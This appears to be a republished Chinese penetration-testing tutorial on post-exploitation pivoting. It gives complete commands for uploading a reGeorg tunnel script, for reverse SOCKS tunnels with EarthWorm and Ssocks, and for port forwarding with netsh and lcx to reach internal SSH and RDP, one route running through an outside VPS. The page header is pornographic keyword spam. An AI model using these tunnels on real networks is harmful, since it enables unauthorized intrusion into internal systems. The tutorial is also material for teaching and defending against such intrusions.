日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内网渗透-端口转发

發(fā)布時間:2024/6/3 编程问答 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内网渗透-端口转发 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

目錄

內(nèi)網(wǎng)轉(zhuǎn)發(fā)

reGeorg結(jié)合proxychains代理鏈(HTTP隧道)

?EW(EarthWorm)結(jié)合proxychains代理鏈

EW正向代理

EW反向代理

Ssocks正向代理(Linux)?

Netsh實現(xiàn)端口轉(zhuǎn)發(fā)

Netsh實現(xiàn)SSH到內(nèi)網(wǎng)主機(遠程端口轉(zhuǎn)發(fā))

Netsh實現(xiàn)3389到內(nèi)網(wǎng)主機(遠程端口轉(zhuǎn)發(fā))

Netsh實現(xiàn)本地端口轉(zhuǎn)發(fā)

LCX實現(xiàn)端口轉(zhuǎn)發(fā)

LCX實現(xiàn)本地端口轉(zhuǎn)發(fā)(Windows的場景)

LCX實現(xiàn)本地端口轉(zhuǎn)發(fā)(Linux的場景)

LCX實現(xiàn)SSH到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Windows)

LCX實現(xiàn)SSH到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Linux)

LCX實現(xiàn)3389到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Windows)

LCX實現(xiàn)3389到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Linux)


內(nèi)網(wǎng)轉(zhuǎn)發(fā)

在滲透測試中,當我們獲得了外網(wǎng)服務(wù)器(如web服務(wù)器,ftp服務(wù)器,mali服務(wù)器等等)的一定權(quán)限后發(fā)現(xiàn)這臺服務(wù)器可以直接或者間接的訪問內(nèi)網(wǎng)。此時滲透測試進入后滲透階段,一般情況下,內(nèi)網(wǎng)中的其他機器是不允許外網(wǎng)機器訪問的。這時候,我們可以通過?端口轉(zhuǎn)發(fā)(隧道)?或?qū)⑦@臺外網(wǎng)服務(wù)器設(shè)置成為?代理,使得我們自己的攻擊機可以直接訪問與操作內(nèi)網(wǎng)中的其他機器。實現(xiàn)這一過程的手段就叫做內(nèi)網(wǎng)轉(zhuǎn)發(fā)

那又有很多人會問了,為什么不直接通過登陸服務(wù)器來對內(nèi)網(wǎng)中其他機器進行滲透,而是通過內(nèi)網(wǎng)轉(zhuǎn)發(fā)呢??

大部分時候我們獲取到的服務(wù)器的權(quán)限不夠,無法直接登錄。 如果直接登錄服務(wù)器中進行操作,我們需要上傳工具進行很多操作,如果服務(wù)器缺少對應(yīng)的環(huán)境變量或者組件,會導(dǎo)致滲透受阻。?而且遠程登錄會留下比較明顯的痕跡 ,因此內(nèi)網(wǎng)轉(zhuǎn)發(fā)是我們最好的選擇,在本地進行操作是最方便的。

常見內(nèi)網(wǎng)轉(zhuǎn)發(fā)工具的分類:

按照協(xié)議進行分類,可以分為:Socks協(xié)議??Socket協(xié)議?

按照工具工作原理分類分為: 端口轉(zhuǎn)發(fā)類(隧道)?和?web代理類

常見的端口轉(zhuǎn)發(fā)工具不限于下面這些,還有很多好用的比如:Tunna、reDuh等。傳送門——>?淺談內(nèi)網(wǎng)端口轉(zhuǎn)發(fā)

reGeorg結(jié)合proxychains代理鏈(HTTP隧道)

reGeory適用于公網(wǎng)服務(wù)器只開放了80端口的情況。

reGeorg是用 python 寫的利用Web進行代理的工具,流量只通過 http 傳輸,也就是http隧道。

現(xiàn)在有這么一個環(huán)境,我們獲取到了位于公網(wǎng)Web服務(wù)器的權(quán)限,或者我們擁有可以往公網(wǎng)Web服務(wù)器web目錄下上傳任何文件的權(quán)限,但是該服務(wù)器開啟了防火墻,只開放了80端口。內(nèi)網(wǎng)中存在另外一臺主機,這里假設(shè)內(nèi)網(wǎng)存在一臺Web服務(wù)器。然后,我們現(xiàn)在要將公網(wǎng)Web服務(wù)器設(shè)置為代理,通過公網(wǎng)服務(wù)器的80端口,訪問和探測內(nèi)網(wǎng)Web服務(wù)器的信息。

根據(jù)公網(wǎng)服務(wù)器網(wǎng)站是哪種腳本類型上傳哪種類型的腳本,這里我搭建的是php環(huán)境,所以上傳php腳本

然后,我們在瀏覽器訪問我們上傳的 php 腳本,上傳路徑我們一定得知道,這里我直接上傳到網(wǎng)站根目錄了。如果看到下面的Georg says, 'All?seems?fine' 表示一切正常!?

然后我們在攻擊機上執(zhí)行如下語句

  • python reGeorgSocksProxy.py -l 0.0.0.0 -p 1080 -u http://100.100.10.12/tunnel.nosocket.php #表示本地1080端口的流量都轉(zhuǎn)發(fā)給指定的那個url
  • 然后配置proxychains代理鏈的配置文件/etc/proxychains.conf ,將代理設(shè)置成本機的1080端口:socks5 127.0.0.1 1080
  • 然后命令前面加上 proxychains即可。如:proxychains curl 192.168.10.19
  • 所以我們流量的走向是: 流量->本地1080端口->web服務(wù)器的80端口(通過我們上傳的php文件進行流量轉(zhuǎn)發(fā))->內(nèi)網(wǎng)服務(wù)器->web服務(wù)器的80端口->本地1080端口
  • ?

    ?如圖,可以看到我們已經(jīng)可以訪問內(nèi)網(wǎng)的Web服務(wù)器。那么,我們就可以進一步滲透了!?

    這里需要主要,使用nmap程序時應(yīng)該注意的點

  • #不能使用nmap默認的掃描方式,不能使用-A -T4參數(shù)
  • proxychains nmap -Pn -sT -p 1-10000 -v 192.168.10.19
  • ?EW(EarthWorm)結(jié)合proxychains代理鏈

    EW 是一套便攜式的網(wǎng)絡(luò)穿透工具,具有 SOCKS5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能,可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透。該工具能夠以“正向”、“反向”、“多級級聯(lián)”等方式打通一條網(wǎng)絡(luò)隧道,直達網(wǎng)絡(luò)深處,用蚯蚓獨有的手段突破網(wǎng)絡(luò)限制,給防火墻松土。工具包中提供了多種可執(zhí)行文件,以適用不同的操作系統(tǒng),Linux、Windows、MacOS、Arm-Linux 均被包括其內(nèi),強烈推薦使用,跨平臺,任何平臺都可以輕松使用!

    現(xiàn)在有這么一個環(huán)境,我們獲取到了位于公網(wǎng)Web服務(wù)器的權(quán)限,內(nèi)網(wǎng)中存在另外一臺主機,這里假設(shè)內(nèi)網(wǎng)存在一臺Web服務(wù)器。然后,我們現(xiàn)在要將公網(wǎng)Web服務(wù)器設(shè)置為代理,訪問和探測內(nèi)網(wǎng)Web服務(wù)器的信息。

    不管是linux還是windows系統(tǒng),Earthworm的包都是一個,如圖上面。直接進入包里面,選擇對應(yīng)的程序即可執(zhí)行

    EW正向代理

    Web服務(wù)器的設(shè)置

  • 如果是Linux系統(tǒng)
  • ./ew_for_linux64 -s ssocksd -l 1080 #監(jiān)聽本地的1080端口
  • 如果是Windows系統(tǒng)
  • ew_for_Win.exe -s ssocksd -l 1080 #監(jiān)聽本地的1080端口
  • 我們主機的設(shè)置

  • 如果是Linux系統(tǒng),配置proxychains代理鏈的配置文件,將代理設(shè)置成 100.100.10.121080端口:socks5 100.100.10.12 1080
  • 然后命令前面加上 proxychains即可。如:proxychains curl 192.168.10.19
  • 如果是Windows系統(tǒng),直接瀏覽器中設(shè)置代理為 100.100.10.121080端口,或者利用 Proxifier 、sockscap64 設(shè)置全局代理
  • EW反向代理

    Web服務(wù)器的設(shè)置

  • 如果是Linux系統(tǒng):
  • ./ew_for_linux64 -s rssocks -d 100.100.10.13 -e 8888 #將本機的流量全部轉(zhuǎn)發(fā)到100.100.10.13的8888端口
  • 如果是Windows系統(tǒng):
  • ew_for_Win.exe -s rssocks -d 100.100.10.13 -e 8888 #將本機的流量全部轉(zhuǎn)發(fā)到100.100.10.13的8888端口
  • 我們主機的設(shè)置

  • 如果是Linux系統(tǒng):
  • ./ew_for_linux64 -s rcsocks -l 1080 -e 8888 #將本機的8888端口的流量都轉(zhuǎn)發(fā)給1080端口,這里8888端口只是用于傳輸流量
  • 然后配置proxychains代理鏈的配置文件,將代理設(shè)置成 127.0.0.11080端口:socks5 127.0.0.1 1080
  • 然后命令前面加上 proxychains即可。如:proxychains curl 192.168.10.19
  • 如果是Windows系統(tǒng)
  • ew_for_Win.exe -s rcsocks -l 1080 -e 8888 #將本機的8888端口的流量都轉(zhuǎn)發(fā)給1080端口,這里8888端口只是用于傳輸流量
  • 然后瀏覽器中設(shè)置代理為 100.100.10.121080端口,或者利用 Proxifier 、sockscap64 設(shè)置全局代理
  • Ssocks正向代理(Linux)

    Ssocks是Linux下一款socks代理工具套裝,可用來開啟socks代理服務(wù),Ssocks支持socks5驗證,支持ipv6和UP,并提供反向socks代理服務(wù)。但是由于Ssocks不穩(wěn)定,所以不建議使用。

    現(xiàn)在有這么一個環(huán)境,我們獲取到了位于公網(wǎng)Web服務(wù)器的shell,該web服務(wù)器是Linux系統(tǒng),內(nèi)網(wǎng)中存在另外一臺主機,這里假設(shè)內(nèi)網(wǎng)存在一臺Web服務(wù)器。然后,我們現(xiàn)在要將公網(wǎng)Web服務(wù)器設(shè)置為代理,訪問和探測內(nèi)網(wǎng)Web服務(wù)器的信息。

    首先,我們的主機和公網(wǎng)的Web服務(wù)器都得安裝上Ssocks。

    安裝Ssocks的話,直接安裝包安裝,軟件會被安裝在 /usr/local/bin目錄下,所以我們得去該目錄執(zhí)行命令。

    正向代理?

    Web服務(wù)器的操作

    ./rssocks -vv -s 100.100.10.13:9999 #接收100.100.10.13的9999端口的流量

    我們主機的操作

  • 首先配置proxychains代理鏈的配置文件,把最后的內(nèi)容改成 socks5 127.0.0.1 8080
  • ./rcsocks -l 1080 -p 9999 -vv #然后將本地的1080端口的流量轉(zhuǎn)發(fā)到9999端口
  • 接下來,我們想要訪問和操作操作內(nèi)網(wǎng)主機192.168.10.19的話,只需要在命令前面加上 proxychains
  • 比如,獲得內(nèi)網(wǎng)Web服務(wù)器的網(wǎng)頁文件: proxychains curl 192.168.10.19
  • 如果這里我們的主機是Windows系統(tǒng)的話,Windows系統(tǒng)下也有很多代理工具,比如 Proxifier 、sockscap64

    Netsh實現(xiàn)端口轉(zhuǎn)發(fā)

    Netsh 是Windows自帶的命令行腳本工具,它可以建立端口映射。

    現(xiàn)在有這么一個環(huán)境,內(nèi)網(wǎng)中有一臺Web服務(wù)器,但是我們處于公網(wǎng),所以無法訪問該服務(wù)器。于是,我們可以在中間Web服務(wù)器上利用Netsh實現(xiàn)一個端口映射,只要我們訪問中間Web服務(wù)器公網(wǎng)地址的指定端口,就相當于我們訪問內(nèi)網(wǎng)Web服務(wù)器的80端口。

    中間Web服務(wù)器的配置

  • netsh interface portproxy add v4tov4 listenaddress=100.100.10.11 listenport=8080 connectaddress=192.168.10.19 connectport=80 #新建一個端口映射,將100.100.10.11的8080端口和192.168.10.19的80端口做個映射
  • netsh interface portproxy show all #查看端口映射
  • netsh interface portproxy delete v4tov4 listenaddress=100.100.10.11 listenport=8080 #刪除端口映射
  • 那么,我們通過訪問Web服務(wù)器的公網(wǎng)地址的8080端口就可以訪問內(nèi)網(wǎng)中的Web服務(wù)器了。

    Netsh實現(xiàn)SSH到內(nèi)網(wǎng)主機(遠程端口轉(zhuǎn)發(fā))

    現(xiàn)在我們有這么一個環(huán)境,我們獲得了公網(wǎng)服務(wù)器的權(quán)限,并且通過公網(wǎng)服務(wù)器進一步的內(nèi)網(wǎng)滲透,得到了內(nèi)網(wǎng)主機的權(quán)限。拓撲圖如下。

    于是,我們還可以利用windows自帶的Netsh來進行22端口的轉(zhuǎn)發(fā)。

    在公網(wǎng)windows服務(wù)器上的操作

    netsh interface portproxy add v4tov4 listenaddress=100.100.10.14 listenport=2222 connectaddress=192.168.10.129 connectport=22 #監(jiān)聽100.100.10.14的2222端口,映射到192.168.10.129 的22端口上

    所以,我們ssh連接到公網(wǎng)服務(wù)器的2222端口即可

    Netsh實現(xiàn)3389到內(nèi)網(wǎng)主機(遠程端口轉(zhuǎn)發(fā))

    現(xiàn)在我們有這么一個環(huán)境,我們獲得了公網(wǎng)服務(wù)器的權(quán)限,并且通過公網(wǎng)服務(wù)器進一步的內(nèi)網(wǎng)滲透,得到了內(nèi)網(wǎng)主機的權(quán)限。拓撲圖如下。

    于是,我們還可以利用Windows自帶的Netsh來進行3389端口的映射。

    在公網(wǎng)windows服務(wù)器上的操作

    netsh interface portproxy add v4tov4 listenaddress=100.100.10.14 listenport=3340 connectaddress=192.168.10.152 connectport=3389

    于是,我們遠程3389連接公網(wǎng)服務(wù)器100.100.10.14的3340端口?

    Netsh實現(xiàn)本地端口轉(zhuǎn)發(fā)

    現(xiàn)在我們有這么一個環(huán)境,我們獲得了公網(wǎng)服務(wù)器的權(quán)限,并且獲得了該服務(wù)器的賬號密碼。該服務(wù)器的3389端口也開放著,但是只對內(nèi)開放,所以我們現(xiàn)在就需要做本地端口映射,將3389端口的流量映射到其他端口。

    該服務(wù)器的操作

    netsh interface portproxy add v4tov4 listenaddress=192.168.10.15 listenport=13389 connectaddress=192.168.10.15 connectport=3389

    只需要遠程連接該主機的13389端口即可

    LCX實現(xiàn)端口轉(zhuǎn)發(fā)

    Lcx是基于socket套接字實現(xiàn)的端口轉(zhuǎn)發(fā)工具,有Windows和Linux版本。

    現(xiàn)在有這么一個環(huán)境,內(nèi)網(wǎng)中有一臺Web服務(wù)器,但是我們處于公網(wǎng),所以無法訪問該服務(wù)器。于是,我們可以在中間Web服務(wù)器上利用LCX進行端口轉(zhuǎn)發(fā),將公網(wǎng)Web服務(wù)器的8080端口流量轉(zhuǎn)發(fā)到內(nèi)網(wǎng)Web主機的80端口上,那么我們訪問公網(wǎng)Web服務(wù)器的8080端口就相當于訪問內(nèi)網(wǎng)Web服務(wù)器的80端口。

    公網(wǎng)web服務(wù)器的配置?

    lcx.exe -tran 8080 192.168.10.19 80 #將本地的8080端口流量轉(zhuǎn)發(fā)到192.168.10.19的80端口上

    當我們訪問公網(wǎng)服務(wù)器的8080端口時,就相當于訪問內(nèi)網(wǎng)服務(wù)器的80端口?

    LCX實現(xiàn)本地端口轉(zhuǎn)發(fā)(Windows的場景)

    我們現(xiàn)在拿到了一臺主機的賬號、密碼和權(quán)限,現(xiàn)在想遠程RDP連接該主機,該主機的3389端口只對內(nèi)開放,不對外開放。所以,我們可以利用lcx進行本地端口的轉(zhuǎn)發(fā)。將3389的流量轉(zhuǎn)到33389端口上。

    目標機的操作,將3389端口的流量轉(zhuǎn)發(fā)給33389端口。

    lcx.exe -tran 33389 127.0.0.1 3389

    只需要遠程連接目標主機的33389端口即可。

    LCX實現(xiàn)本地端口轉(zhuǎn)發(fā)(Linux的場景)

    我們現(xiàn)在拿到了一臺主機的賬號、密碼和權(quán)限,現(xiàn)在想遠程SSH連接該主機,該主機的22端口只對內(nèi)開放,不對外開放。所以,我們可以利用lcx進行本地端口的轉(zhuǎn)發(fā)。將2222的流量轉(zhuǎn)到22端口上。

    目標機的操作,將2222端口的流量都轉(zhuǎn)發(fā)到22端口上

    只需要遠程連接目標主機的2222端口即可。

    LCX實現(xiàn)SSH到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Windows)

    現(xiàn)在我們有這么一個環(huán)境,我們獲得了公網(wǎng)服務(wù)器的權(quán)限,并且通過公網(wǎng)服務(wù)器進一步的內(nèi)網(wǎng)滲透,得到了內(nèi)網(wǎng)主機的權(quán)限。拓撲圖如下。

    于是,我們還可以利用lcx來進行22端口的轉(zhuǎn)發(fā)。

    在公網(wǎng)windows服務(wù)器上的操作

    lcx.exe -tran 2222 192.168.10.129 22 #意思就是將本地2222端口轉(zhuǎn)發(fā)給192.168.10.129主機的22號端口

    所以,我們ssh連接到公網(wǎng)服務(wù)器的2222端口即可

    LCX實現(xiàn)SSH到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Linux)

    首先,在VPS上進行下面操作。監(jiān)聽 2222 的流量,將其轉(zhuǎn)發(fā)給 22222 端口。相當于正向代理

    ./lcx -m 2 -p1 22222 -h2 127.0.0.1 -p2 2222 #將本地2222端口的流量給本地的22222端口

    在內(nèi)網(wǎng)主機上操作,將22端口的流量轉(zhuǎn)發(fā)到VPS(114.118.80.138)的22222端口。相當于反向代理

    ./lcx -m 3 -h1 127.0.0.1 -p1 22 -h2 114.118.80.138 -p2 22222 #將本地22端口的流量給114.118.80.138的22222端口

    我們連接VPS的2222端口,就相當于連接了內(nèi)網(wǎng)主機的22端口。

    ssh root@114.118.80.138 2222 #連接到114.118.80.138的2222端口

    LCX實現(xiàn)3389到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Windows)

    現(xiàn)在我們有這么一個環(huán)境,我們獲得了公網(wǎng)Windows服務(wù)器的權(quán)限,并且通過公網(wǎng)服務(wù)器進一步的內(nèi)網(wǎng)滲透,得到了內(nèi)網(wǎng)Linux主機的權(quán)限。拓撲圖如下。我們現(xiàn)在想SSH到內(nèi)網(wǎng)Linux主機。

    于是,我們還可以利用lcx來進行3389端口的轉(zhuǎn)發(fā)。

    在公網(wǎng)windows服務(wù)器上的操作

    lcx.exe -tran 3340 192.168.10.18 3389 #意思就是將本地的3340端口的流量轉(zhuǎn)發(fā)給192.168.10.18主機的3389端口

    于是,我們遠程連接公網(wǎng)服務(wù)器100.100.10.14的3340端口

    LCX實現(xiàn)3389到內(nèi)網(wǎng)主機(公網(wǎng)服務(wù)器是Linux)

    現(xiàn)在我們有這么一個環(huán)境,我們獲得了公網(wǎng)Linux服務(wù)器的權(quán)限,并且通過公網(wǎng)服務(wù)器進一步的內(nèi)網(wǎng)滲透,得到了內(nèi)網(wǎng)Windows主機的權(quán)限。拓撲圖如下?,F(xiàn)在我們想3389連接到內(nèi)網(wǎng)Windows服務(wù)器。

    在公網(wǎng)Linux服務(wù)器上的操作

    ./lcx -m 2 -p1 23389 -h2 127.0.0.1 -p2 13389 #監(jiān)聽本地23389的流量轉(zhuǎn)發(fā)給本地的13389端口,正向代理

    在內(nèi)網(wǎng)Windows服務(wù)器上的操作

    lcx.exe -slave 192.168.10.20 13389 127.0.0.1 3389 #將本地3389端口的流量都轉(zhuǎn)發(fā)給192.168.10.20,反向代理

    遠程連接公網(wǎng)服務(wù)器的23389端口即可

    ?

    ?

    ?

    相關(guān)文章: 內(nèi)網(wǎng)全局代理工具及特征分析

    ? ? ? ? ? ? ? ? ? ?Socket套接字和Sockes協(xié)議

    ? ? ? ? ? ? ? ? ? ?正向代理和反向代理

    ? ? ? ? ? ? ? ? ? ?端口轉(zhuǎn)發(fā)和端口映射

    ? ? ? ? ? ? ? ? ? ?內(nèi)網(wǎng)穿透

    ? ? ? ? ? ? ? ? ? ?SSH反向隧道

    本文相關(guān)軟件:?https://pan.baidu.com/s/1Fd9D6BrkTrTTy9Ko1MHrfw? ? 提取碼: ixgi

    ?

    總結(jié)

    以上是生活随笔為你收集整理的内网渗透-端口转发的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。